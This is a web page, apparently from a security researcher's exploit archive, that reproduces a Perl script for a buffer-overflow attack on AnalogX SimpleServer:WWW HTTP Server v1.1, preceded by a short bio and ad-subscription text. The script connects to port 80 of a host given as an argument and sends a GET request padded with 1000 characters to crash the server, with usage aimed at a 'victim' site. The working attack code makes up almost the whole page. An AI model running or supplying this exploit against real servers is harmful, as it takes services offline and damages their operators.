Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

AnalogX.pl
AnalogX.pl
AnalogX.pl

#!/usr/bin/perl
#
# Buffer Overflow exploit for AnalogX SimpleServer:WWW HTTP Server AnalogX.pl

#!/usr/bin/perl
#
# Buffer Overflow exploit for AnalogX SimpleServer:WWW HTTP Server v1.1
# ---------------------------------------------------------------------
#
# Exploit Coded By : Neon-Lenz (This email address is being protected from spambots. You need JavaScript enabled to view it.)
#
# Website: http://TheGovernment.Com/Cyrax
#
# Usage: ./AnalogX.pl <host>
#
# Example: ./AnalogX.pl www.victim.com
#
# Greets To: Acid Blades, ThePike, Trib, Kn00p, KeyDet, DarkHunter and
# everyone else i forgot to mention !

use IO::Socket;

$host=$ARGV[0];
$port=80;

print <<"EOT";

AnalogX SimpleServer:WWW HTTP Server v1.1 Buffer Overflow By Neon-Lenz
----------------------------------------------------------------------
Usage: ./AnalogX.pl <host> (assign a webserver, or it won't work)

Example: ./AnalogX.pl www.victim.com

EOT

$sock = IO::Socket::INET->new(PeerAddr => $host, # Connects to the host
PeerPort => $port,
Proto => 'tcp');

$z=Z;

$send = $z x 1000; # Overflows the host
print "GET 1000 chars on remote webserver.\n";
print $sock "GET /$send\n";
sleep(3);
print "Done. AnalogX server should be dead.\n";


close($sock) # Hmm closes the stuff, duh!

#EOC - End Of Code
Social Media Share